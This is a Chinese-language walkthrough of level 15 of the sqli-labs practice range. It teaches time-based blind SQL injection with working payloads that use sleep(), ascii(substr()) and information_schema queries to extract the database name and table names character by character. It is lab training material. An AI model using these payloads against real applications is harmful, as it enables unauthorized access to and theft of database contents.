SQL 时间盲注 (injection 第十五关)

简介

SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

SQL注入的一个简要流程:

1、打开目标靶场

2、选择less - 15

3、确定网站可以注入的参数

本关可以直接在输入框中搜索

4、判断闭合方式

本关为 1' #

5、确定字段列数

使用 order by

若页面正常,则存在1列,输入 1' and if(length(database())>7,sleep(5),1) #

发现有时间延迟,则数据库长度大于7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

1' and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表

查询第一张表的第一个字符

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全

网络是把双刃剑,安全使用是关键

​​​​​​​

相关推荐
楼田莉子1 小时前
Qt开发学习——QtCreator深度介绍/程序运行/开发规范/对象树
开发语言·前端·c++·qt·学习
摩羯座-185690305941 小时前
爬坑 10 年!京东店铺全量商品接口实战开发:从分页优化、SKU 关联到数据完整性闭环
linux·网络·数据库·windows·爬虫·python
韩立学长2 小时前
【开题答辩实录分享】以《基于python的奶茶店分布数据分析与可视化》为例进行答辩实录分享
开发语言·python·数据分析
天若有情6732 小时前
C++空值初始化利器:empty.h使用指南
开发语言·c++
YoungLime2 小时前
DVWA靶场之十三:CSP 绕过(Content Security Policy (CSP) Bypass)
网络·安全·web安全
远远远远子2 小时前
类与对象 --1
开发语言·c++·算法
无敌最俊朗@2 小时前
C/C++ 关键关键字面试指南 (const, static, volatile, explicit)
c语言·开发语言·c++·面试
2401_831501732 小时前
Python学习之day03学习(文件和异常)
开发语言·python·学习
编程充电站pro2 小时前
SQL 面试高频:INNER JOIN vs LEFT JOIN 怎么考?
数据库·sql
这周也會开心2 小时前
SQL-窗口函数做题总结
数据库·sql